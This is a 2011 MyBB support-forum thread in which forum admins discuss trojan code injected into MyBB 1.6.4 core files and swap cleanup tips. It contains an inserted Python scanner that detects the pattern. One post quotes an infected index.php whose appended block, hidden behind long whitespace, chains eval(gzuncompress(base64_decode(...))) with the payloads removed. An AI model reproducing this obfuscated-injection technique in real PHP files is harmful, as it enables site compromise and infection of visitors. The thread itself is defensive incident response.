MyBB Community Forums

Full Version: 1.6.4 Security Vulnerability
Why do you have a trojan on your computer?
That's what came through the base64-coded script.

So I had to remove it.
./inc/mybb_group.php
Line 16: echo base64_decode($mybb_logo);

./task.php
Line 59: echo base64_decode("R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==");

The two areas in MyBB are the only places you will find base64_decode. If you find it anywhere else, you should probably remove it.
Thanks, I found it in a couple other files as well ...

[attachment=24671]

The only file of this list which didn't have the code in it was the 'showthread' page ... (I believe this is because I've got the 'while you were posting plugin' installed).

So I have to go to the process all over again ... I posted a warning on my forum, I feel sorry for my members! (I'm working on a Mac myself so haven't got any problems).
I have replaced all the above files again ... and I hope this is it, that the problems are finally over!
I too was affected before it was announced. I did all of the fixes, and plan to go back through again as soon as I can get to my PC that has FTP access.
But today, a member got this warning from his AVG software:
[Image: Capture-4.jpg]
I just used my phone to check my index.php and found that it has the base64 junk that the previous posts mentioned!!

INFECTED CODE. FOR EXAMINATION ONLY!!: [attachment=24674]

INFECTED CODE. FOR EXAMINATION ONLY!!:
<?php
/**
 * MyBB 1.6
 * Copyright 2010 MyBB Group, All Rights Reserved
 *
 * Website: http://mybb.com
 * License: http://mybb.com/about/license
 *
 * $Id: index.php 5440 2011-04-15 10:18:35Z Tomm $
 */

define("IN_MYBB", 1);
define('THIS_SCRIPT', 'index.php');

$templatelist = "index,index_whosonline,index_welcomemembertext,index_welcomeguest,index_whosonline_memberbit,forumbit_depth1_cat,forumbit_depth1_forum,forumbit_depth2_cat,forumbit_depth2_forum,forumbit_depth1_forum_lastpost,forumbit_depth2_forum_lastpost,index_modcolumn,forumbit_moderators,forumbit_subforums,index_welcomeguesttext";
$templatelist .= ",index_birthdays_birthday,index_birthdays,index_pms,index_loginform,index_logoutlink,index_stats,forumbit_depth3,forumbit_depth3_statusicon,index_boardstats";

require_once "./global.php";

require_once MYBB_ROOT."inc/functions_post.php";
require_once MYBB_ROOT."inc/functions_forumlist.php";
require_once MYBB_ROOT."inc/class_parser.php";
$parser = new postParser;

$plugins->run_hooks("index_start");

// Load global language phrases
$lang->load("index");

$logoutlink = $loginform = '';
if($mybb->user['uid'] != 0)
{
	eval("\$logoutlink = \"".$templates->get("index_logoutlink")."\";");
}
else
{
	//Checks to make sure the user can login; they haven't had too many tries at logging in.
	//Function call is not fatal
	if(login_attempt_check(false) !== false)
	{
		eval("\$loginform = \"".$templates->get("index_loginform")."\";");
	}
}
$whosonline = '';
if($mybb->settings['showwol'] != 0 && $mybb->usergroup['canviewonline'] != 0)
{
	// Get the online users.
	$timesearch = TIME_NOW - $mybb->settings['wolcutoff'];
	$comma = '';
	$query = $db->query("
		SELECT s.sid, s.ip, s.uid, s.time, s.location, s.location1, u.username, u.invisible, u.usergroup, u.displaygroup
		FROM ".TABLE_PREFIX."sessions s
		LEFT JOIN ".TABLE_PREFIX."users u ON (s.uid=u.uid)
		WHERE s.time>'$timesearch'
		ORDER BY u.username ASC, s.time DESC
	");

	$forum_viewers = array();
	$membercount = 0;
	$onlinemembers = '';
	$guestcount = 0;
	$anoncount = 0;
	$doneusers = array();

	// Fetch spiders
	$spiders = $cache->read("spiders");

	// Loop through all users.
	while($user = $db->fetch_array($query))
	{
		// Create a key to test if this user is a search bot.
		$botkey = my_strtolower(str_replace("bot=", '', $user['sid']));

		// Decide what type of user we are dealing with.
		if($user['uid'] > 0)
		{
			// The user is registered.
			if($doneusers[$user['uid']] < $user['time'] || !$doneusers[$user['uid']])
			{
				// If the user is logged in anonymously, update the count for that.
				if($user['invisible'] == 1)
				{
					++$anoncount;
				}
				++$membercount;
				if($user['invisible'] != 1 || $mybb->usergroup['canviewwolinvis'] == 1 || $user['uid'] == $mybb->user['uid'])
				{
					// If this usergroup can see anonymously logged-in users, mark them.
					if($user['invisible'] == 1)
					{
						$invisiblemark = "*";
					}
					else
					{
						$invisiblemark = '';
					}

					// Properly format the username and assign the template.
					$user['username'] = format_name($user['username'], $user['usergroup'], $user['displaygroup']);
					$user['profilelink'] = build_profile_link($user['username'], $user['uid']);
					eval("\$onlinemembers .= \"".$templates->get("index_whosonline_memberbit", 1, 0)."\";");
					$comma = $lang->comma;
				}
				// This user has been handled.
				$doneusers[$user['uid']] = $user['time'];
			}
		}
		elseif(my_strpos($user['sid'], "bot=") !== false && $spiders[$botkey])
		{
			// The user is a search bot.
			$onlinemembers .= $comma.format_name($spiders[$botkey]['name'], $spiders[$botkey]['usergroup']);
			$comma = $lang->comma;
			++$botcount;
		}
		else
		{
			// The user is a guest.
			++$guestcount;
		}

		if($user['location1'])
		{
			$forum_viewers[$user['location1']]++;
		}
	}

	// Build the who's online bit on the index page.
	$onlinecount = $membercount + $guestcount + $botcount;
	
	if($onlinecount != 1)
	{
		$onlinebit = $lang->online_online_plural;
	}
	else
	{
		$onlinebit = $lang->online_online_singular;
	}
	if($membercount != 1)
	{
		$memberbit = $lang->online_member_plural;
	}
	else
	{
		$memberbit = $lang->online_member_singular;
	}
	if($anoncount != 1)
	{
		$anonbit = $lang->online_anon_plural;
	}
	else
	{
		$anonbit = $lang->online_anon_singular;
	}
	if($guestcount != 1)
	{
		$guestbit = $lang->online_guest_plural;
	}
	else
	{
		$guestbit = $lang->online_guest_singular;
	}
	$lang->online_note = $lang->sprintf($lang->online_note, my_number_format($onlinecount), $onlinebit, $mybb->settings['wolcutoffmins'], my_number_format($membercount), $memberbit, my_number_format($anoncount), $anonbit, my_number_format($guestcount), $guestbit);
	eval("\$whosonline = \"".$templates->get("index_whosonline")."\";");
}

// Build the birthdays for to show on the index page.
$bdays = $birthdays = '';
if($mybb->settings['showbirthdays'] != 0)
{
	// First, see what day this is.
	$bdaycount = 0; $bdayhidden = 0;
	$bdaytime = TIME_NOW;
	$bdaydate = my_date("j-n", $bdaytime, '', 0);
	$year = my_date("Y", $bdaytime, '', 0);
	
	$bdaycache = $cache->read("birthdays");
	
	if(!is_array($bdaycache))
	{
		$cache->update_birthdays();
		$bdaycache = $cache->read("birthdays");
	}
	
	$hiddencount = $bdaycache[$bdaydate]['hiddencount'];
	$today_bdays = $bdaycache[$bdaydate]['users'];
	
	$comma = '';
	if(!empty($today_bdays))
	{
		foreach($today_bdays as $bdayuser)
		{
			$bday = explode("-", $bdayuser['birthday']);
			if($year > $bday['2'] && $bday['2'] != '')
			{
				$age = " (".($year - $bday['2']).")";
			}
			else
			{
				$age = '';
			}
			$bdayuser['username'] = format_name($bdayuser['username'], $bdayuser['usergroup'], $bdayuser['displaygroup']);
			$bdayuser['profilelink'] = build_profile_link($bdayuser['username'], $bdayuser['uid']);
			eval("\$bdays .= \"".$templates->get("index_birthdays_birthday", 1, 0)."\";");
			++$bdaycount;
			$comma = $lang->comma;
		}
	}
	
	if($hiddencount > 0)
	{
		if($bdaycount > 0)
		{
			$bdays .= " - ";
		}
		$bdays .= "{$hiddencount} {$lang->birthdayhidden}";
	}
	
	// If there are one or more birthdays, show them.
	if($bdaycount > 0 || $hiddencount > 0)
	{
		eval("\$birthdays = \"".$templates->get("index_birthdays")."\";");
	}
}

// Build the forum statistics to show on the index page.
if($mybb->settings['showindexstats'] != 0)
{
	// First, load the stats cache.
	$stats = $cache->read("stats");

	// Check who's the newest member.
	if(!$stats['lastusername'])
	{
		$newestmember = "no-one";
	}
	else
	{
		$newestmember = build_profile_link($stats['lastusername'], $stats['lastuid']);
	}

	// Format the stats language.
	$lang->stats_posts_threads = $lang->sprintf($lang->stats_posts_threads, my_number_format($stats['numposts']), my_number_format($stats['numthreads']));
	$lang->stats_numusers = $lang->sprintf($lang->stats_numusers, my_number_format($stats['numusers']));
	$lang->stats_newestuser = $lang->sprintf($lang->stats_newestuser, $newestmember);

	// Find out what the highest users online count is.
	$mostonline = $cache->read("mostonline");
	if($onlinecount > $mostonline['numusers'])
	{
		$time = TIME_NOW;
		$mostonline['numusers'] = $onlinecount;
		$mostonline['time'] = $time;
		$cache->update("mostonline", $mostonline);
	}
	$recordcount = $mostonline['numusers'];
	$recorddate = my_date($mybb->settings['dateformat'], $mostonline['time']);
	$recordtime = my_date($mybb->settings['timeformat'], $mostonline['time']);

	// Then format that language string.
	$lang->stats_mostonline = $lang->sprintf($lang->stats_mostonline, my_number_format($recordcount), $recorddate, $recordtime);

	eval("\$forumstats = \"".$templates->get("index_stats")."\";");
}

// Show the board statistics table only if one or more index statistics are enabled.
if($mybb->settings['showwol'] != 0 || $mybb->settings['showindexstats'] != 0 || ($mybb->settings['showbirthdays'] != 0 && $bdaycount > 0))
{
	if(!is_array($stats))
	{
		// Load the stats cache.
		$stats = $cache->read("stats");
	}

	$post_code_string = '';
	if($mybb->user['uid'])
	{
		$post_code_string = "&my_post_key=".$mybb->post_code;
	}

	eval("\$boardstats = \"".$templates->get("index_boardstats")."\";");
}

if($mybb->user['uid'] == 0)
{
	// Build a forum cache.
	$query = $db->query("
		SELECT *
		FROM ".TABLE_PREFIX."forums
		WHERE active != 0
		ORDER BY pid, disporder
	");
	
	$forumsread = unserialize($mybb->cookies['mybb']['forumread']);
}
else
{
	// Build a forum cache.
	$query = $db->query("
		SELECT f.*, fr.dateline AS lastread
		FROM ".TABLE_PREFIX."forums f
		LEFT JOIN ".TABLE_PREFIX."forumsread fr ON (fr.fid=f.fid AND fr.uid='{$mybb->user['uid']}')
		WHERE f.active != 0
		ORDER BY pid, disporder
	");
}
while($forum = $db->fetch_array($query))
{
	if($mybb->user['uid'] == 0)
	{
		if($forumsread[$forum['fid']])
		{
			$forum['lastread'] = $forumsread[$forum['fid']];
		}
	}
	$fcache[$forum['pid']][$forum['disporder']][$forum['fid']] = $forum;
}
$forumpermissions = forum_permissions();

// Get the forum moderators if the setting is enabled.
if($mybb->settings['modlist'] != "off")
{	
	$moderatorcache = $cache->read("moderators");
}

$excols = "index";
$permissioncache['-1'] = "1";
$bgcolor = "trow1";

// Decide if we're showing first-level subforums on the index page.
if($mybb->settings['subforumsindex'] != 0)
{
	$showdepth = 3;
}
else
{
	$showdepth = 2;
}
$forum_list = build_forumbits();
$forums = $forum_list['forum_list'];

$plugins->run_hooks("index_end");

eval("\$index = \"".$templates->get("index")."\";");
output_page($index);

?>
                                                                                                                                                                                                                                                                                                    <?php eval(gzuncompress(base64_decode('[base64 payload removed]')));  eval(gzuncompress(base64_decode('[base64 payload removed]')));  eval(gzuncompress(base64_decode('[base64 payload removed]'))); ?>

I'm frantically replacing the files that you guys listed. THANKS! It just sucks that I have to do this with my phone.
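A scan script, added here as an example (it is not part of this thread or of MyBB), that applies the checks the posts above describe: it whitelists the two legitimate base64_decode() lines named earlier (inc/mybb_group.php line 16 and task.php line 59, line numbers as given for 1.6.4), flags any other base64_decode() or eval(gzuncompress(base64_decode(...))) call, and flags a second <?php block appended after a file's closing ?> as in the infected index.php above. The sample file contents at the bottom are constructed, not taken from the thread.

```python
import re
from pathlib import Path

# The only legitimate base64_decode() calls in a stock MyBB 1.6.x tree, as
# listed in the thread above: (path relative to the forum root, line number).
KNOWN_GOOD = {("inc/mybb_group.php", 16), ("task.php", 59)}

# eval() fed by gzuncompress(base64_decode(...)): the exact chain appended to
# the infected index.php posted above.
EVAL_CHAIN = re.compile(r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(", re.I)
B64 = re.compile(r"\bbase64_decode\s*\(", re.I)
# A second "<?php" block following the file's closing "?>" (the infected file
# pads the gap with a long run of spaces so the tail sits off-screen in editors).
TRAILING_BLOCK = re.compile(r"\?>\s+<\?php")


def scan_source(relpath, source):
    """Return (relpath, line_no, reason) findings for the text of one PHP file."""
    findings = []
    for no, line in enumerate(source.splitlines(), start=1):
        if EVAL_CHAIN.search(line):
            findings.append((relpath, no, "eval(gzuncompress(base64_decode(...)))"))
        elif B64.search(line) and (relpath, no) not in KNOWN_GOOD:
            findings.append((relpath, no, "base64_decode() outside the known-good list"))
    m = TRAILING_BLOCK.search(source)
    if m:
        line_no = source.count("\n", 0, m.end()) + 1
        findings.append((relpath, line_no, "second <?php block after the closing ?>"))
    return findings


def scan_tree(root):
    """Walk a MyBB install directory and scan every .php file under it."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        findings.extend(scan_source(rel, path.read_text(errors="replace")))
    return findings


# Constructed samples, not files from the thread: a task.php whose only
# base64_decode() sits on line 59, and an index.php with the appended payload.
CLEAN_TASK = "<?php\n" + "// filler line\n" * 57 + 'echo base64_decode("R0lGODlh");\n?>\n'
INFECTED_INDEX = ("<?php\noutput_page($index);\n?>\n" + " " * 200
                  + "<?php eval(gzuncompress(base64_decode('AAAA'))); ?>\n")

if __name__ == "__main__":
    for hit in scan_source("task.php", CLEAN_TASK) + scan_source("index.php", INFECTED_INDEX):
        print("%s:%d: %s" % hit)
```

Run scan_tree() against the forum root after re-uploading clean files; anything it reports besides the two whitelisted lines is worth comparing against the matching file from the release archive.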
I have an old chatbox that also had an infected index.php file. Search for any and all index.php files.

My concern is how were they able to hack in again? Where is the hole? I changed my ftp password and all that the last time around.
I just had to re-upload the clean index.php file on all three of my sites again because it showed a fatal error when I tried to go to the index page.
Is this an isolated problem with Robbert and myself, or the beginning of the next onslaught??
Apparently I missed some infected files the first time. I spent my evening going through the entire process again. I hope I got it all this time.
Changed all the passwords since the last time and got hacked another time...
The hole was explained in the first post, I believe.
Today the same member got this:
[Image: Capture2-1.jpg]

I checked the index.php and it was correct. Did some spot checking and didn't see any of the problems I saw the last time. I will do more investigating this evening when I get to my PC, but wanted to post this in the meantime.
Any thoughts on what I should be looking for? And where I should be looking?
(2011-11-22, 10:21 PM) Reserector Wrote: Today the same member got this:
[Image: Capture2-1.jpg]

I checked the index.php and it was correct. Did some spot checking and didn't see any of the problems I saw the last time. I will do more investigating this evening when I get to my PC, but wanted to post this in the meantime.
Any thoughts on what I should be looking for? And where I should be looking?

A member at my site got the exact same thing. There were 5 or 6 files that had been changed in File Verification, so I swapped those out as well as the index PHP file. Hope that solves it for now. Still not cool that after the problem and alleged fix my users may be getting trojans.
It's been a while with no virus alerts, until today. I admit I have been putting off the 1.6.5 update. I want to know if this recent upgrade will make this problem go away, or do I need to fix this virus problem before continuing?
Here is what a forum member posted for me today:
I have replaced pretty much all php and js files with clean files from the last upgrade, plus the security fix. Changed my password on my server, also. Based on what keeps showing up, what files should I be checking or replacing?

[Image: attachment.php?aid=6476]